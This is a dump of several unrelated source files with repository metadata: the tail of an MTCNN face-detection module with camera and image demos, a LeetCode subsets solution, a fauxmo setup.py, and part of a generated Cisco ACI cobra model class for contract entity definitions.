all_boxes[:, 4]])
boxes_c = boxes_c.T
return boxes_c,all_boxes
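    # Note: with net_size=12 and min_face_size=24 the pyramid starts at
    # scale 12/24 = 0.5 and shrinks geometrically by scale_factor (0.79 by
    # default) until the resized image is smaller than the 12x12 PNet input.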
def detect_rnet(self, im, dets):
"""Get face candidates using rnet
Parameters:
----------
im: numpy array
input image array
dets: numpy array
detection results of pnet
Returns:
-------
boxes: numpy array
detected boxes before calibration
boxes_c: numpy array
boxes after calibration
"""
h, w, c = im.shape
height,width = h,w
if self.train_face:
dets = self.convert_to_square(dets)
else:
#dets = self.convert_to_rect(dets)
dets = dets
dets[:, 0:4] = np.round(dets[:, 0:4])
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = self.pad(dets, w, h)
#num_boxes = dets.shape[0]
num_boxes = tmpw.shape[0]
cropped_ims = np.zeros((num_boxes, 24, 24, 3), dtype=np.float32)
if num_boxes <= 0:
return None,None
for i in range(num_boxes):
tmp = np.zeros((tmph[i], tmpw[i], 3), dtype=np.uint8)
tmp[dy[i]:edy[i] + 1, dx[i]:edx[i] + 1, :] = im[y[i]:ey[i] + 1, x[i]:ex[i] + 1, :]
cropped_ims[i, :, :, :] = (cv2.resize(tmp, (24, 24))-127.5) / 128
#cls_scores : num_data*2
#reg: num_data*4
#landmark: num_data*10
if self.train_face:
#cls_scores, reg, _ = self.rnet_detector.predict(cropped_ims)
cls_scores, reg, landmark = self.rnet_detector.predict(cropped_ims)
else:
cls_scores, reg = self.rnet_detector.predict(cropped_ims)
cls_scores = cls_scores[:,1]
keep_inds = np.where(cls_scores > self.thresh[1])[0]
if len(keep_inds) > 0:
boxes = dets[keep_inds]
boxes[:, 4] = cls_scores[keep_inds]
reg = reg[keep_inds]
if self.train_face:
landmark = landmark[keep_inds]
else:
return None, None
if self.train_face:
#width
w = boxes[:,2] - boxes[:,0] + 1
#height
h = boxes[:,3] - boxes[:,1] + 1
landmark[:,0::2] = (np.tile(w,(5,1)) * landmark[:,0::2].T + np.tile(boxes[:,0],(5,1)) - 1).T
landmark[:,1::2] = (np.tile(h,(5,1)) * landmark[:,1::2].T + np.tile(boxes[:,1],(5,1)) - 1).T
#"Minimum"
if self.r_out:
keep = py_nms(boxes, self.nms_thresh[1],"Minimum")
else:
keep = py_nms(boxes, self.nms_thresh[1],"Union")
boxes = boxes[keep]
boxes_c = self.calibrate_box(boxes, reg[keep],height,width)
if self.train_face:
landmark = landmark[keep]
return boxes_c,landmark
else:
return boxes_c,None
def detect_onet(self, im, dets):
"""Get face candidates using onet
Parameters:
----------
im: numpy array
input image array
dets: numpy array
detection results of rnet
Returns:
-------
boxes: numpy array
detected boxes before calibration
boxes_c: numpy array
boxes after calibration
"""
h, w, c = im.shape
height,width = h, w
if self.train_face:
dets = self.convert_to_square(dets)
else:
#dets = self.convert_to_rect(dets)
dets = dets
dets[:, 0:4] = np.round(dets[:, 0:4])
[dy, edy, dx, edx, y, ey, x, ex, tmpw, tmph] = self.pad(dets, w, h)
num_boxes = dets.shape[0]
cropped_ims = np.zeros((num_boxes, 48, 48, 3), dtype=np.float32)
real_box_num = 0
for i in range(num_boxes):
if tmph[i]<=1 or tmpw[i]<=1:
continue
tmp = np.zeros((tmph[i], tmpw[i], 3), dtype=np.uint8)
tmp[dy[i]:edy[i] + 1, dx[i]:edx[i] + 1, :] = im[y[i]:ey[i] + 1, x[i]:ex[i] + 1, :]
cropped_ims[i, :, :, :] = (cv2.resize(tmp, (48, 48))-127.5) / 128
real_box_num+=1
if real_box_num <=0:
return None, None
if self.train_face:
cls_scores, reg,landmark = self.onet_detector.predict(cropped_ims)
else:
cls_scores, reg = self.onet_detector.predict(cropped_ims)
#prob belongs to face
cls_scores = cls_scores[:,1]
keep_inds = np.where(cls_scores > self.thresh[2])[0]
if len(keep_inds) > 0:
            # pick out the filtered boxes
boxes = dets[keep_inds]
boxes[:, 4] = cls_scores[keep_inds]
reg = reg[keep_inds]
if self.train_face:
landmark = landmark[keep_inds]
else:
return None, None
#width
w = boxes[:,2] - boxes[:,0] + 1
#height
h = boxes[:,3] - boxes[:,1] + 1
if self.train_face:
landmark[:,0::2] = (np.tile(w,(5,1)) * landmark[:,0::2].T + np.tile(boxes[:,0],(5,1)) - 1).T
landmark[:,1::2] = (np.tile(h,(5,1)) * landmark[:,1::2].T + np.tile(boxes[:,1],(5,1)) - 1).T
boxes_c = self.calibrate_box(boxes, reg,height,width)
keep = py_nms(boxes_c,self.nms_thresh[2], "Minimum")
boxes_c = boxes_c[keep]
if self.train_face:
landmark = landmark[keep]
return boxes_c,landmark
else:
return boxes_c,None
#use for video
def detect(self, img):
"""Detect face over image
"""
boxes = None
t = time.time()
# pnet
t1 = 0
if self.pnet_detector:
boxes_c,all_box = self.detect_pnet(img)
if boxes_c is None:
return np.array([]),np.array([])
t1 = time.time() - t
t = time.time()
#print("Pnet out ",boxes_c.shape)
            order_idx = np.argsort(boxes_c[:,4])[::-1]  # sort by score, descending
sel_num = config.P_Num if len(boxes_c) > config.P_Num else len(boxes_c)
boxes_c = boxes_c[order_idx[:sel_num]]
#print("Pnet out ",boxes_c.shape)
boxes_p = boxes_c
# rnet
'''
for i in range(10):
print("box_c ",map(int,boxes_c[i]))
print("box",map(int,all_box[i]))
'''
t2 = 0
if self.rnet_detector:
boxes_c,landmark_r = self.detect_rnet(img, boxes_c)
if boxes_c is None:
return np.array([]),np.array([])
t2 = time.time() - t
t = time.time()
bbox_r = boxes_c
if self.r_out:
print("time cost " + '{:.3f}'.format(t1 + t2) + ' pnet {:.3f} rnet {:.3f} '.format(t1, t2))
return bbox_r,landmark_r
# onet
t3 = 0
if self.onet_detector:
#boxes, boxes_c,landmark = self.detect_onet(img, boxes_c)
if config.o_out:
boxes_c,landmark = self.detect_onet(img, boxes_p)
else:
boxes_c,landmark = self.detect_onet(img, boxes_c)
if boxes_c is None:
return np.array([]),np.array([])
t3 = time.time() - t
t = time.time()
#print( "time cost " + '{:.3f}'.format(t1 + t2 + t3) + ' pnet {:.3f} rnet {:.3f} onet {:.3f}'.format(t1, t2,t3))
return boxes_c,landmark
def detect_face(self, test_data):
all_boxes = []#save each image's bboxes
landmarks = []
batch_idx = 0
sum_time = 0
#test_data is iter_
data_num = test_data.size
print("MtcnnDetect image num ",data_num)
#for databatch in test_data:
for i in range(data_num):
databatch = test_data.next()
#databatch(image returned)
if batch_idx % 100 == 0:
print("%d images done" % batch_idx)
im = databatch
# pnet
t1 = 0
if self.pnet_detector:
t = time.time()
#ignore landmark
boxes_c, landmark = self.detect_pnet(im)
t1 = time.time() - t
sum_time += t1
if boxes_c is None:
print("img path: ",test_data.img_path)
print("boxes_c is None...")
all_boxes.append(np.array([]))
                    # keep the lists aligned: also append an empty landmark entry
landmarks.append(np.array([]))
batch_idx += 1
continue
                order_idx = np.argsort(boxes_c[:,4])[::-1]  # sort by score, descending
                sel_num = config.P_Num if len(boxes_c) > config.P_Num else len(boxes_c)
boxes_c = boxes_c[order_idx[:sel_num]]
# rnet
t2 = 0
if self.rnet_detector:
t = time.time()
#ignore landmark
boxes_c, landmark = self.detect_rnet(im, boxes_c)
t2 = time.time() - t
sum_time += t2
if boxes_c is None:
all_boxes.append(np.array([]))
landmarks.append(np.array([]))
batch_idx += 1
continue
# onet
t3 = 0
if self.onet_detector:
t = time.time()
boxes_c, landmark = self.detect_onet(im, boxes_c)
t3 = time.time() - t
sum_time += t3
if boxes_c is None:
all_boxes.append(np.array([]))
landmarks.append(np.array([]))
batch_idx += 1
continue
#print("time cost " + '{:.3f}'.format(sum_time) + ' pnet {:.3f} rnet {:.3f} onet {:.3f}'.format(t1, t2,t3))
all_boxes.append(boxes_c)
landmarks.append(landmark)
batch_idx += 1
#num_of_data*9,num_of_data*10
return all_boxes,landmarks
# test demo
test_relu =config.train_face
def parameter():
parser = argparse.ArgumentParser(description='Mtcnn camera test')
parser.add_argument("--min_size",type=int,default=24,\
        help='determine the image pyramid; the least value is 12')
parser.add_argument("--threshold",type=float,default=[0.5,0.7,0.9],nargs="+",\
help='filter the proposals according to score')
parser.add_argument("--slid_window",type=bool,default=False,\
        help='if true, Pnet will use a sliding window to produce proposals')
parser.add_argument('--batch_size',type=int,default=[1,256,32],nargs="+",\
        help='determine the pnet/rnet/onet input batch_size')
parser.add_argument('--epoch_load',type=int,default=[32,2700,25],nargs="+",\
        help='load the saved parameters for pnet/rnet/onet')
parser.add_argument('--file_in',type=str,default='None',\
help='input file')
return parser.parse_args()
def load_model(epoch_load):
if test_relu==5 or test_relu==100:
if config.rnet_wide:
#5,500,60; 5,1700,60
prefix = ["../data/MTCNN_model/PNet_landmark/PNet", "../data/MTCNN_model/RNet_landmark/rnet_wide/RNet", "../data/MTCNN_model/ONet_landmark/ONet"]
else:
# 5,40,60
prefix = ["../data/MTCNN_model/PNet_landmark/PNet", "../data/MTCNN_model/RNet_landmark/RNet", "../data/MTCNN_model/ONet_landmark/ONet"]
else:
#epoch_load = [32,30,25],[32,4400,25]
#prefix = ["../data/MTCNN_model/PNet_landmark/v1_trained/PNet", "../data/MTCNN_model/RNet_landmark/v1_trained/RNet", "../data/MTCNN_model/ONet_landmark/v1_trained/ONet"]
#[205,500,200]
prefix = ["../../trained_models/MTCNN_bright_model/PNet_landmark/PNet", "../../trained_models/MTCNN_bright_model/RNet_landmark/RNet", "../../trained_models/MTCNN_bright_model/ONet_landmark/ONet"]
#pedestrain [80,360,200],[580,4900,600],[1600,4500,600],[1600,2900,4000]
#prefix = ["../data/MTCNN_caltech_model/PNet_landmark/PNet", "../data/MTCNN_caltech_model/RNet_landmark/RNet", "../data/MTCNN_caltech_model/ONet_landmark/ONet"]
#person voc[1600,2900,300]
#prefix = ["../data/MTCNN_voc_model/PNet_landmark/PNet", "../data/MTCNN_voc_model/RNet_landmark/RNet", "../data/MTCNN_voc_model/ONet_landmark/ONet"]
print("demo epoch load ",epoch_load)
model_path = ["%s-%s" %(x,y ) for x, y in zip(prefix,epoch_load)]
print("demo model path ",model_path)
return model_path
def process_img():
param = parameter()
min_size = param.min_size
score_threshold = param.threshold
slid_window = param.slid_window
if test_relu==100:
batch_size = [1,1,1]
else:
batch_size = param.batch_size
epoch_load = param.epoch_load
multi_detector = [None,None,None]
    # load the parameter paths
model_path = load_model(epoch_load)
#load net result
if slid_window:
print("using slid window")
Pnet_det = None
return [None,None,None]
else:
Pnet_det = FcnDetector(P_Net,model_path[0])
Rnet_det = Detector(R_Net,data_size=24,batch_size=batch_size[1],model_path=model_path[1])
Onet_det = Detector(O_Net,data_size=48,batch_size=batch_size[2],model_path=model_path[2])
multi_detector = [Pnet_det,Rnet_det,Onet_det]
#get bbox and landmark
Mtcnn_detector = MtcnnDetector(multi_detector,min_size,threshold=score_threshold)
#bboxs,bbox_clib,landmarks = Mtcnn_detector.detect(img)
return Mtcnn_detector
def add_label(img,bbox,landmark):
#print("labe ",bbox.shape)
num = bbox.shape[0]
font = cv2.FONT_HERSHEY_COMPLEX_SMALL
font_scale =1
thickness = 1
for i in range(num):
x1,y1,x2,y2 = int(bbox[i,0]),int(bbox[i,1]),int(bbox[i,2]),int(bbox[i,3])
cv2.rectangle(img,(x1,y1),(x2,y2),(255,0,0),1)
score_label = str('{:.2f}'.format(bbox[i,4]))
size = cv2.getTextSize(score_label, font, font_scale, thickness)[0]
if y1-int(size[1]) <= 0:
cv2.rectangle(img, (x1, y2), (x1 + int(size[0]), y2+int(size[1])), (255, 0, 0))
cv2.putText(img, score_label, (x1,y2+size[1]), font, font_scale, (255, 255, 255), thickness)
else:
cv2.rectangle(img, (x1, y1-int(size[1])), (x1 + int(size[0]), y1), (255, 0, 0))
cv2.putText(img, score_label, (x1,y1), font, font_scale, (255, 255, 255), thickness)
if landmark is not None:
for i in range(landmark.shape[0]):
for j in range(5):
#print(int(landmark[i][2*j]),int(landmark[i][2*j+1]))
cv2.circle(img, (int(landmark[i][2*j]),int(landmark[i][2*j+1])), 2, (0,0,255))
def camera(file_in):
cv2.namedWindow("result")
cv2.moveWindow("result",1400,10)
#camera_cap = cv2.VideoCapture('/home/lxy/Develop/Center_Loss/face_detect/videos/profile_video.wmv')
if file_in =='None':
camera_cap = cv2.VideoCapture(0)
else:
camera_cap = cv2.VideoCapture(file_in)
if not camera_cap.isOpened():
print("failded open camera")
return -1
mtcnn_dec = process_img()
    while camera_cap.isOpened():
        ret,frame = camera_cap.read()
        if ret:
            h,w,_ = frame.shape  # read the shape only after a successful grab
            bbox_clib,landmarks = mtcnn_dec.detect(frame)
            print("landmark ",bbox_clib.shape)
            if len(bbox_clib):
                bbox_clib = board_img(bbox_clib,w,h)
                add_label(frame,bbox_clib,landmarks)
            if (cv2.waitKey(1) & 0xFF) == ord('q'):  # fixed operator precedence
                break
            cv2.imshow("result",frame)
        else:
            print("can not find device")
            break
camera_cap.release()
cv2.destroyAllWindows()
def demo_img(file_in):
cv2.namedWindow("result")
cv2.moveWindow("result",1400,10)
if file_in =='None':
cv2.destroyAllWindows()
print("please input right path")
return -1
else:
img = cv2.imread(file_in)
mtcnn_dec = process_img()
bbox_clib,landmarks = mtcnn_dec.detect(img)
if len(bbox_clib):
add_label(img,bbox_clib,landmarks)
cv2.imshow("result",img)
cv2.waitKey(0)
def board_img(boxes,wid,height):
#print ('box shape ',np.shape(boxes))
#print boxes
x1,y1,x2,y2 = boxes[:,0],boxes[:,1],boxes[:,2],boxes[:,3],
offset_w = (x2-x1)/5.0
offset_h = (y2-y1)/5.0
x1 -= offset_w
#y1 -= 4*offset_h
x2 += offset_w
y2 += offset_h
    x1 = np.maximum(x1,0).astype(int)
    #y1 = np.maximum(y1,0).astype(int)
    y1 = np.zeros_like(x1)  # clamp the top edge to the image border
    x2 = np.minimum(x2,wid-1).astype(int)
    y2 = np.minimum(y2,height-1).astype(int)
box = [x1,y1,x2,y2,boxes[:,4]]
#box = [x1,y1,x2,y2]
box = np.asarray(box)
#print("box shape",np.shape(box))
box = np.vstack(box)
return box.T
def GetFaces(file_in):
'''
param = parameter()
min_size = param.min_size
score_threshold = param.threshold
slid_window = param.slid_window
batch_size = param.batch_size
epoch_load = param.epoch_load
multi_detector = [None,None,None]
'''
if file_in =='None':
#cv2.destroyAllWindows()
print("please input right path")
return []
else:
#img = cv2.imread(file_in)
img = file_in
h,w,_ = img.shape
min_size = 24
score_threshold = [0.5,0.7,0.9]
slid_window = False
batch_size = [1,256,16]
#epoch_load = [205,500,200]
epoch_load = [32,2700,25]
multi_detector = [None,None,None]
prefix = ["../../trained_models/MTCNN_bright_model/PNet_landmark/PNet", "../../trained_models/MTCNN_bright_model/RNet_landmark/RNet", "../../trained_models/MTCNN_bright_model/ONet_landmark/ONet"]
print("demo epoch load ",epoch_load)
model_path = ["%s-%s" %(x,y ) for x, y in zip(prefix,epoch_load)]
#load net result
if slid_window:
print("using slid window")
Pnet_det = None
return [None,None,None]
else:
Pnet_det = FcnDetector(P_Net,model_path[0])
Rnet_det = Detector(R_Net,data_size=24,batch_size=batch_size[1],model_path=model_path[1])
Onet_det = Detector(O_Net,data_size=48,batch_size=batch_size[2],model_path=model_path[2])
multi_detector = [Pnet_det,Rnet_det,Onet_det]
#get bbox and landmark
Mtcnn_detector = MtcnnDetector(multi_detector,min_size,threshold=score_threshold)
#bboxs,bbox_clib,landmarks = Mtcnn_detector.detect(img)
bbox_clib,landmarks = Mtcnn_detector.detect(img)
if len(bbox_clib):
bbox_clib =board_img(bbox_clib,w,h)
#add_label(img,bbox_clib,landmarks)
#cv2.imshow("result",img)
#cv2.waitKey(0)
#bbox_clib[:,2] = bbox_clib[:,2] - bbox_clib[:,0]
#bbox_clib[:,3] = bbox_clib[:,3] - bbox_clib[:,1]
#bbox_clib[:,0] = map(int,bbox_clib[:,0])
#bbox_clib[:,1] = map(int,bbox_clib[:,1])
#bbox_clib[:,2] = map(int,bbox_clib[:,2])
#bbox_clib[:,3] = map(int,bbox_clib[:,3])
#bbox_clib = bbox_clib[:,:4]
else:
bbox_clib= np.array([])
landmarks = np.array([])
return bbox_clib
if __name__ == '__main__':
#process_img()
arg = parameter()
file_in = arg.file_in
camera(file_in)
#demo_img(file_in)
#a = get_faces(file_in)
#print(a)
| [
"[email protected]"
] | |
35bad535a079fa4d1c260581d0e8fc3ca1dd433a | 59b72b8f662cd605b3ce31f54779c17e5ca066d0 | /interview_q/leet_code/子集.py | d6aa3df0e62c43481165dd5041958cface2a3827 | [] | no_license | dongyang2/hello-world | c1f5853ccafd6b8f23836192547ab36f898e0891 | 1f859b53e2b21ed5a648da09b84950f03ec1b370 | refs/heads/master | 2022-12-11T22:07:22.853912 | 2022-11-24T03:52:35 | 2022-11-24T03:52:35 | 119,025,960 | 0 | 0 | null | 2018-01-26T10:09:58 | 2018-01-26T08:28:10 | null | UTF-8 | Python | false | false | 2,388 | py | # https://leetcode-cn.com/problems/subsets/
# coding: utf-8
# Python 3
# Given an array of integers with no duplicate elements, return all possible
# subsets of the array, including the empty set.
#
# Approach: directly reuse the function from the combinations file (组合.py).
# Optimization: inspecting the output for an input of n=10 shows that the
# later results equal the set difference between the input array and the
# earlier results, e.g. every subset of length 9 equals the length-10 input
# minus one of the length-1 subsets.
# Edge cases:
def erg_new_new(li, k, tmp, com):
n = len(tmp)
if n == k:
com.append(tmp)
else:
for i in range(len(li)):
if n > 0 and li[i] < tmp[-1]:
continue
elif n <= k-1:
# erg_new_new(li[i+1:], k, append_val(tmp, li[i]), com)
erg_new_new(li[i + 1:], k, tmp+[li[i]], com)
def combination(li, k):
n = len(li)
if k > n or k == 0:
return []
if k == 1:
return [[x] for x in li]
if k == n:
return [li]
com = []
erg_new_new(li, k, [], com)
return com
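# Quick check of the helper above: combination([1, 2, 3], 2) yields
# [[1, 2], [1, 3], [2, 3]].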
def sub_set(li):
ss = [[[]]]
sorted_li = sorted(li)
n = len(li)
half = int(n/2)
for i in range(1, half+1):
ss.append(combination(sorted_li, i))
if n % 2 == 0:
start_reverse = n-half+1
else:
start_reverse = n-half
for i in range(start_reverse, n+1):
tmp = []
for j in ss[n-i]:
tmp.append(difference(li, j))
ss.append(tmp)
ans = []
for i in ss:
ans += i
return ans
def difference(li, sub_li):
return [x for x in li if x not in sub_li]
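# Worked example of the complement trick (hypothetical values): for
# li = [1, 2, 3], each size-2 subset is the complement of a size-1 subset,
# e.g. difference([1, 2, 3], [1]) -> [2, 3], so only sizes up to n//2 need
# to be enumerated directly.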
def main():
tmp = []
tmp += []
print(tmp)
tmp = [[]]
    tmp += []  # it turns out Python treats list += [] as adding nothing (no extra empty list is appended)
print(tmp)
tmp = [[]]
    tmp += [[]]  # to actually append an empty list, do it like this
print(tmp)
tmp = [[]]
tmp += [[1], [2]]
print(tmp)
li1 = [1, 3, 5, 6]
li2 = [4, 6]
print(difference(li1, li2))
li1 = [1, 3, 5, 6]
li2 = []
print(difference(li1, li2))
n = 20
li = [x+1 for x in range(n)]
# print(combination(li, 5))
print(sub_set(li))
if __name__ == '__main__':
import time
print('-' * 15, 'Start', time.ctime(), '-' * 15, '\n')
main()
print('%s%s %s %s %s' % ('\n', '-' * 16, 'End', time.ctime(), '-' * 16))
| [
"[email protected]"
] | |
e25d5c6d44603dfc1ac7be40c0f5e63bce951fac | 332ac6deaed8b8917cf874f04fc77246378bdb44 | /setup.py | 4db61d01cd37dbb3dd83d18bdb2eb0d4634cfe76 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | hestela/fauxmo | 5a435399eca61c525502dc90333ee73cff0d3d15 | f2246b952a0246bf0dcd74e770c9daea0dcaa763 | refs/heads/master | 2020-03-11T15:45:48.414168 | 2018-04-19T00:56:27 | 2018-04-19T01:08:35 | 130,095,227 | 0 | 0 | null | 2018-04-18T16:58:43 | 2018-04-18T16:58:43 | null | UTF-8 | Python | false | false | 1,755 | py | import re
from setuptools import setup, find_packages
try:
import pypandoc
readme = pypandoc.convert('README.md', 'rst')
history = pypandoc.convert('CHANGELOG.md', 'rst')
except ImportError:
with open('README.md') as readme_file, \
open('CHANGELOG.md') as history_file:
readme = readme_file.read()
history = history_file.read()
with open('requirements-dev.txt') as dev_requirements_file, \
open('requirements-test.txt') as tests_requirements_file:
test_requirements = tests_requirements_file.read().splitlines()
dev_requirements = dev_requirements_file.read().splitlines()
dev_requirements.extend(test_requirements)
version_regex = re.compile(r'__version__ = [\'\"]v((\d+\.?)+)[\'\"]')
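# e.g. a line __version__ = 'v0.4.5' yields the captured version "0.4.5"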
with open('src/fauxmo/__init__.py') as f:
vlines = f.readlines()
__version__ = next(re.match(version_regex, line).group(1) for line in vlines
if re.match(version_regex, line))
setup(
name="fauxmo",
version=__version__,
description="Emulated Belkin WeMo devices that work with the Amazon Echo",
long_description=readme + "\n\n" + history,
author="Nathan Henrie",
author_email="[email protected]",
url="https://github.com/n8henrie/fauxmo",
packages=find_packages("src"),
package_dir={"": "src"},
include_package_data=True,
license="MIT",
zip_safe=False,
keywords=["fauxmo", "alexa", "amazon echo"],
classifiers=[
"Natural Language :: English",
"Programming Language :: Python :: 3.6"
],
extras_require={
"dev": dev_requirements
},
test_suite="tests",
tests_require=test_requirements,
entry_points={'console_scripts': ['fauxmo=fauxmo.cli:cli']},
python_requires=">=3.6",
)
| [
"[email protected]"
] | |
5e9b31b9c658c18ee03c3afdab9042716a92b89b | 24fe1f54fee3a3df952ca26cce839cc18124357a | /servicegraph/lib/python2.7/site-packages/acimodel-4.0_3d-py2.7.egg/cobra/modelimpl/vz/ctrctentitydef.py | cf877348cdffddd74f0ba1250b5de389e328ad62 | [] | no_license | aperiyed/servicegraph-cloudcenter | 4b8dc9e776f6814cf07fe966fbd4a3481d0f45ff | 9eb7975f2f6835e1c0528563a771526896306392 | refs/heads/master | 2023-05-10T17:27:18.022381 | 2020-01-20T09:18:28 | 2020-01-20T09:18:28 | 235,065,676 | 0 | 0 | null | 2023-05-01T21:19:14 | 2020-01-20T09:36:37 | Python | UTF-8 | Python | false | false | 15,939 | py | # coding=UTF-8
# **********************************************************************
# Copyright (c) 2013-2019 Cisco Systems, Inc. All rights reserved
# written by zen warriors, do not modify!
# **********************************************************************
from cobra.mit.meta import ClassMeta
from cobra.mit.meta import StatsClassMeta
from cobra.mit.meta import CounterMeta
from cobra.mit.meta import PropMeta
from cobra.mit.meta import Category
from cobra.mit.meta import SourceRelationMeta
from cobra.mit.meta import NamedSourceRelationMeta
from cobra.mit.meta import TargetRelationMeta
from cobra.mit.meta import DeploymentPathMeta, DeploymentCategory
from cobra.model.category import MoCategory, PropCategory, CounterCategory
from cobra.mit.mo import Mo
# ##################################################
class CtrctEntityDef(Mo):
"""
The contract entity definition.
"""
meta = ClassMeta("cobra.model.vz.CtrctEntityDef")
meta.moClassName = "vzCtrctEntityDef"
meta.rnFormat = "entity-[%(epgDn)s]"
meta.category = MoCategory.REGULAR
meta.label = "Summary of EPg: Contains All Info to Create ProvDef/ConsDef"
meta.writeAccessMask = 0x1
meta.readAccessMask = 0x1
meta.isDomainable = False
meta.isReadOnly = True
meta.isConfigurable = False
meta.isDeletable = False
meta.isContextRoot = False
meta.childClasses.add("cobra.model.fault.Counts")
meta.childClasses.add("cobra.model.health.Inst")
meta.childClasses.add("cobra.model.vz.ProvSubjLblDef")
meta.childClasses.add("cobra.model.vz.ProvLblDef")
meta.childClasses.add("cobra.model.vz.ConsCtrctLblDef")
meta.childClasses.add("cobra.model.vz.ConsSubjLblDef")
meta.childClasses.add("cobra.model.telemetry.MatchedSelector")
meta.childClasses.add("cobra.model.l3ext.SubnetDef")
meta.childClasses.add("cobra.model.vz.ProvCtrctLblDef")
meta.childClasses.add("cobra.model.fv.RsEPgDefToL2Dom")
meta.childClasses.add("cobra.model.fv.RsEPgDefToL3Dom")
meta.childClasses.add("cobra.model.vz.ConsLblDef")
meta.childClasses.add("cobra.model.fault.Delegate")
meta.childNamesAndRnPrefix.append(("cobra.model.fv.RsEPgDefToL2Dom", "rsEPgDefToL2Dom"))
meta.childNamesAndRnPrefix.append(("cobra.model.fv.RsEPgDefToL3Dom", "rsEPgDefToL3Dom"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ConsCtrctLblDef", "cCtrctLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.telemetry.MatchedSelector", "matchedSel-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ProvCtrctLblDef", "pCtrctLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ProvSubjLblDef", "pSubjLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ConsSubjLblDef", "cSubjLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.l3ext.SubnetDef", "extsubnet-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Counts", "fltCnts"))
meta.childNamesAndRnPrefix.append(("cobra.model.health.Inst", "health"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ProvLblDef", "pLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.vz.ConsLblDef", "cLblD-"))
meta.childNamesAndRnPrefix.append(("cobra.model.fault.Delegate", "fd-"))
meta.parentClasses.add("cobra.model.vz.DirAssDef")
meta.parentClasses.add("cobra.model.vz.IntDef")
meta.parentClasses.add("cobra.model.fv.CtxDef")
meta.parentClasses.add("cobra.model.vz.SubjDef")
meta.parentClasses.add("cobra.model.vz.IntraEPgDef")
meta.parentClasses.add("cobra.model.vz.InheritedDef")
meta.parentClasses.add("cobra.model.vz.EpgAnyDef")
meta.superClasses.add("cobra.model.fv.EPgDef")
meta.superClasses.add("cobra.model.vz.ACtrctEpgDef")
meta.superClasses.add("cobra.model.fv.AEPgDef")
meta.superClasses.add("cobra.model.naming.NamedObject")
meta.superClasses.add("cobra.model.pol.Obj")
meta.superClasses.add("cobra.model.pol.Def")
meta.superClasses.add("cobra.model.fv.EPgCont")
meta.rnPrefixes = [
('entity-', True),
]
prop = PropMeta("str", "anyDn", "anyDn", 16600, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("anyDn", prop)
prop = PropMeta("str", "bdDefDn", "bdDefDn", 1811, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("bdDefDn", prop)
prop = PropMeta("str", "bdDefStQual", "bdDefStQual", 1812, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("default-target", "default-target", 2)
prop._addConstant("mismatch-target", "mismatch-target", 1)
prop._addConstant("none", "none", 0)
meta.props.add("bdDefStQual", prop)
prop = PropMeta("str", "childAction", "childAction", 4, PropCategory.CHILD_ACTION)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("deleteAll", "deleteall", 16384)
prop._addConstant("deleteNonPresent", "deletenonpresent", 8192)
prop._addConstant("ignore", "ignore", 4096)
meta.props.add("childAction", prop)
prop = PropMeta("str", "ctrctUpd", "ctrctUpd", 1078, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "ctrct"
prop._addConstant("ctrct", "ctrct", 0)
prop._addConstant("epg", "epg", 1)
prop._addConstant("not_defined", "not_defined", 0)
meta.props.add("ctrctUpd", prop)
prop = PropMeta("str", "ctxDefDn", "ctxDefDn", 1813, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("ctxDefDn", prop)
prop = PropMeta("str", "ctxDefStQual", "ctxDefStQual", 1814, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = 0
prop.defaultValueStr = "none"
prop._addConstant("default-target", "default-target", 2)
prop._addConstant("mismatch-target", "mismatch-target", 1)
prop._addConstant("none", "none", 0)
meta.props.add("ctxDefStQual", prop)
prop = PropMeta("str", "ctxPcTag", "ctxPcTag", 15850, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop._addConstant("any", "any", 0)
meta.props.add("ctxPcTag", prop)
prop = PropMeta("str", "ctxSeg", "ctxSeg", 1809, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("ctxSeg", prop)
prop = PropMeta("str", "descr", "descr", 5579, PropCategory.REGULAR)
prop.label = "Description"
prop.isConfig = True
prop.isAdmin = True
prop.range = [(0, 128)]
prop.regex = ['[a-zA-Z0-9\\!#$%()*,-./:;@ _{|}~?&+]+']
meta.props.add("descr", prop)
prop = PropMeta("str", "dn", "dn", 1, PropCategory.DN)
prop.label = "None"
prop.isDn = True
prop.isImplicit = True
prop.isAdmin = True
prop.isCreateOnly = True
meta.props.add("dn", prop)
prop = PropMeta("str", "epgDn", "epgDn", 16150, PropCategory.REGULAR)
prop.label = "None"
prop.isConfig = True
prop.isAdmin = True
prop.isCreateOnly = True
prop.isNaming = True
meta.props.add("epgDn", prop)
prop = PropMeta("str", "exceptionTag", "exceptionTag", 37059, PropCategory.REGULAR)
prop.label = "Contract Exception Tag"
prop.isImplicit = True
prop.isAdmin = True
prop.range = [(0, 512)]
meta.props.add("exceptionTag", prop)
prop = PropMeta("str", "isAny", "isAny", 1077, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
prop.defaultValue = False
prop.defaultValueStr = "no"
prop._addConstant("no", None, False)
prop._addConstant("yes", None, True)
meta.props.add("isAny", prop)
prop = PropMeta("str", "l3CtxEncap", "l3CtxEncap", 1815, PropCategory.REGULAR)
prop.label = "None"
prop.isImplicit = True
prop.isAdmin = True
meta.props.add("l3CtxEncap", prop)
